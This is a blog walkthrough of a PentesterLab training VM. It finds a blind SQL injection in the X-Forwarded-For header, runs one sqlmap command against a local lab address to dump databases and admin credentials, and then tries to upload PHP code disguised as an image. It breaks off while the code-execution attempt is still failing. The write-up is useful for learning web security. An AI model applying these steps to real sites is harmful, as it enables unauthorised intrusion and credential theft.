From SQL Injection to Shell 2:Walkthough

I found this challange really interesting & challenging something which is quite  close to the practical web app security that we witness in our daily work .

Without much ado lets jump into the thing.So this write up unfolds the second challanges of   SQL injection to shell-II &  gain access to the administration console. 

You can download the VM-iso:Pentester Lab’s “From SQL Injection to Shell 2″.

This excercise is all about the exploting the blind-sql injection and finding vulnerabilty in framework.

if some one is not familiar about blind-sql injection.Then one can go here  blind SQL injection" .In short blind-sql injection can prove a pain in ass cause unlike other error based ,it demands higher degree of patience.

So keeping my patience i Move forward and tried to exploit every possible parameter that application presented to me.

Step:Recon The application

This is first step before attack,know your application,its behaviour and information its disclose during such test.

1.Application is based on php
2.Framework used:nginx(version:0.7.67)

The application will look like screenshot below


Attack to find point of injection:Point of injection is very important in exploiting a sql injection.so i tried everything to find out that point of injection.Honestly speaking :FAILED!!![by this time i have not visited the course content on the site to get clues,i wanted to do it blind as a regular black box which i usually do]

Then i thought of possible structure of website ,for this i tried to look for some files in the application.

On that line i saw all the pictures uploaded in the website is having path,/admin/uploads/picture.extension

so this means that only admin has image uploading capabilty,if there is "user" table then it have probably username & password for admin only.

so i started fiddling with the headers now:
1.Cookies
2.user-agent
3.referrer
4.added a header:X-Forwarded-For
 
I failed in all 3 but with but with 4 it clicked,see screenshot below
Now when i am sure that x-forwarded-for (This header is being used by application to capture IP of client where Ips is passing through the proxy)
 
Lets exploit using popular tool :sqlmap
 
python sqlpmap.py -u "http://192.168.0.102" --headers ="x-forwarded-for:*" --dbs [I used this line to dump the database name in case header is vulnerable to sql injection] 

This gave me the database name:Photoblog

Now time to dump the tables of database above

Output is given below
So we got for tables:
categories
pictures
stats--******
users
 
Now lets go to dump the data of tables:users & its contents
 Now when we have login & password of admin lets go and use the credentials to login into the account.we can see there is add a new picture,so time to explore a RCE
so tried all possible bypasses but failed there,so i thought to to upload a file ,with malicious php code inside the image,i did excatly that .The image uploaded by me when accessed it display just the image no code execution.when accessed normally it just diplay the image[screenshot below].I thought what now???